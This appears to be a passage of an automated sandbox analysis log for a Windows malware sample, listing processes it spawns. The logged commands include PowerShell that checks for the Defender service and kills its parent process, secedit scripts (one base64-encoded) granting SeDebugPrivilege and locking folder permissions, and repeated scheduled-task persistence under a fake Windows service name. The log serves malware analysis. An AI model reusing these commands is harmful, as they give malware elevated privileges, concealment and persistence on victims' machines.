Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Section loaded: edputil.dll	Jump to behavior
